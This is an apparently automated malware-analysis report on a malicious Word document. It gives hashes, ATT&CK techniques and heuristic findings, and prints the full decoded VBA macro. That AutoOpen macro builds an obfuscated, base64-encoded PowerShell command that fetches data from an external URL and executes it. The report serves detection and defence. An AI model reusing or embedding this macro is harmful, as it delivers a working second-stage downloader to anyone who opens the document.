Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2f8b47d5afffe14…

MALICIOUS

Office (OLE)

267.5 KB Created: 2018-02-23 14:51:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 106ed79673c55d8f05559ad7d71860b8 SHA-1: 0fa922436a3a6d35767ca8f0493e200c5114ae09 SHA-256: f2f8b47d5afffe14ab2f180e77f9e43cdbf92739f3b968a95335ad6bc07c1042
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a series of string concatenations and array lookups to construct and execute a command. The critical heuristic 'OLE_VBA_SHELL' strongly suggests this command is intended to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        JL_QC = JL_QC + IR_PD
    Shell$ JL_QC
End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "green"
Sub AutoOpen()
    Dim JL_QC As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5836 bytes
SHA-256: 304813dccd45287ca60ecd5fcbca7837710ddb36306be65bff2ce9d82d949fdc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "green"
Sub AutoOpen()
    Dim JL_QC As String
    HP_PG = Array("i", "r", "d", "-", " ", "t", "h", "b", "u", "a", "w", "p", "o", "x", "n", "c", "s", "y", "e", "l")
    Dim AO_LJ As String
    AO_LJ = "ZgB1AG4AYwB0AGkAbwBuACA"
    JL_QC = JL_QC + HP_PG(11)
    JL_QC = JL_QC + HP_PG(12)
    Dim DS_OE As String
    DS_OE = "AYQAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbA"
    JL_QC = JL_QC + HP_PG(10)
    JL_QC = JL_QC + HP_PG(18)
    Dim AO_OH As String
    AO_OH = "FMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    JL_QC = JL_QC + HP_PG(1)
    JL_QC = JL_QC + HP_PG(16)
    Dim IQ_TF As String
    IQ_TF = "G4AZwBdADoAOgBVAFQAR"
    JL_QC = JL_QC + HP_PG(6)
    JL_QC = JL_QC + HP_PG(18)
    Dim BT_SA As String
    BT_SA = "gA4AC4ARwBlAHQAUwB0A"
    IR_PD = IR_PD & AO_LJ & DS_OE & AO_OH & IQ_TF & BT_SA
    JL_QC = JL_QC + HP_PG(19)
    JL_QC = JL_QC + HP_PG(19)
    Dim IT_QG As String
    IT_QG = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4A"
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim CN_LG As String
    CN_LG = "dgBlAHIAdABdADoAOgBGAHIAbwBtAEIAY"
    JL_QC = JL_QC + HP_PG(10)
    JL_QC = JL_QC + HP_PG(0)
    Dim GR_KH As String
    GR_KH = "QBzAGUANgA0AFMAdAByAGkAbgBnACgA"
    JL_QC = JL_QC + HP_PG(14)
    JL_QC = JL_QC + HP_PG(2)
    Dim ES_MC As String
    ES_MC = "JAB4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgA"
    JL_QC = JL_QC + HP_PG(12)
    JL_QC = JL_QC + HP_PG(10)
    Dim DT_QB As String
    DT_QB = "CQAKAAkACgAJAAoAGkAbgB2AG8Aa"
    IR_PD = IR_PD & IT_QG & CN_LG & GR_KH & ES_MC & DT_QB
    JL_QC = JL_QC + HP_PG(16)
    JL_QC = JL_QC + HP_PG(5)
    Dim AT_MA As String
    AT_MA = "wBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0"
    JL_QC = JL_QC + HP_PG(17)
    JL_QC = JL_QC + HP_PG(19)
    Dim CK_QF As String
    CK_QF = "AHQAcABzADo"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(4)
    Dim JT_OE As String
    JT_OE = "ALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgBhAGw"
    JL_QC = JL_QC + HP_PG(6)
    JL_QC = JL_QC + HP_PG(0)
    Dim DM_NI As String
    DM_NI = "ALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBp"
    JL_QC = JL_QC + HP_PG(2)
    JL_QC = JL_QC + HP_PG(2)
    Dim HL_NE As String
    HL_NE = "AG4AZABvAHcAcw"
    IR_PD = IR_PD & AT_MA & CK_QF & JT_OE & DM_NI & HL_NE
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(14)
    Dim GS_PJ As String
    GS_PJ = "AuAG4AZQB0AC8AdwBhA"
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim HS_NI As String
    HS_NI = "HIAZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByA"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(13)
    Dim EM_LF As String
    EM_LF = "D0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJ"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(15)
    Dim BL_RA As String
    BL_RA = "QAyADAAZQBxACUAMgAw"
    JL_QC = JL_QC + HP_PG(8)
    JL_QC = JL_QC + HP_PG(5)
    Dim FP_MD As String
    FP_MD = "ACUAMgA3AHMAdABhAGcAZQAlADIANwAmACQAUwBlAGwA"
    IR_PD = IR_PD & GS_PJ & HS_NI & EM_LF & BL_RA & FP_MD
    JL_QC = JL_QC + HP_PG(0)
    JL_QC = JL_QC + HP_PG(12)
    Dim DN_LG As String
    DN_LG = "ZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgA"
    JL_QC = JL_QC + HP_PG(14)
    JL_QC = JL_QC + HP_PG(11)
    Dim BR_TA As String
    BR_TA = "wADEANwAtADAANAAtADEANwAmAHMAcwA9A"
    JL_QC = JL_QC + HP_PG(12)
    JL_QC = JL_QC + HP_PG(19)
    Dim CT_QC As String
    CT_QC = "GIAZgBxAHQA"
    JL_QC = JL_QC + HP_PG(0)
    JL_QC = JL_QC + HP_PG(15)
    Dim BM_LA As String
    BM_LA = "JgBzAHIAdAA9AHMAYwBvAC"
    JL_QC = JL_QC + HP_PG(17)
    JL_QC = JL_QC + HP_PG(4)
    Dim DL_TE As String
    DL_TE = "YAcwBwAD0AcgB3AGQAbABhAGMAdQBwACYAcwBlAD0AMgAwA"
    IR_PD = IR_PD & DN_LG & BR_TA & CT_QC & BM_LA & DL_TE
    JL_QC = JL_QC + HP_PG(7)
    JL_QC = JL_QC + HP_PG(17)
    Dim AT_OA As String
    AT_OA = "DEANwAtADEAMAAtADAANgBUADIAMgA6ADQAMQA"
    JL_QC = JL_QC + HP_PG(11)
    JL_QC = JL_QC + HP_PG(9)
    Dim BK_NI As String
    BK_NI = "6ADEAMgBaACYAcwB0AD0"
    JL_QC = JL_QC + HP_PG(16)
    JL_QC = JL_QC + HP_PG(16)
    Dim EP_KG As String
    EP_KG = "AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQ"
    JL_QC = JL_QC + HP_PG(4)
    JL_QC = JL_QC + HP_PG(3)
    Dim BQ_KI As String
    BQ_KI = "A6ADEAMgBaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9"
    JL_QC = JL_QC + HP_PG(18)
    JL_QC = JL_QC + HP_PG(4)
    Dim FR_QG As String
    FR_QG = "AHQAegBQADcAYwA4AHgAWgBoAH"
    IR_PD = IR_PD & AT_OA & BK_NI & EP_KG & BQ_KI & FR_QG
    Dim DT_SC As String
    DT_SC = "IAMQBzAGIAdgB4"
    Dim AP_SH As String
    AP_SH = "ADkAZgBKAFMAdwBKAEkAUwBIAE"
    Dim EO_RE As String
    EO_RE = "IANgBlADgAJQAyAEIAbg"
    Dim GP_TG As String
    GP_TG = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEACcAIAAt"
    Dim CO_OJ As String
    CO_OJ = "AEgAZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwB"
    IR_PD = IR_PD & DT_SC & AP_SH & EO_RE & GP_TG & CO_OJ
    Dim FM_MB As String
    FM_MB = "lAHAAdAA"
    Dim IM_KE As String
    IM_KE = "nAD0AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4A"
    Dim AQ_TH As String
    AQ_TH = "LwBKAFMATwBOAC"
    Dim CQ_TD As String
    CQ_TD = "cAfQApAC4AQwBvAG4A"
    Dim DN_PG As String
    DN_PG = "dABlAG4AdAAgAHwAIABDAG8AbgB"
    IR_PD = IR_PD & FM_MB & IM_KE & AQ_TH & CQ_TD & DN_PG
    Dim HL_SH As String
    HL_SH = "2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEA"
    IR_PD = IR_PD & HL_SH
    Dim DK_SC As String
    DK_SC = "bAB1AGUALgBkAGEAdABhACkAKQA="
    IR_PD = IR_PD & DK_SC
    JL_QC = JL_QC + IR_PD
    Shell$ JL_QC
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.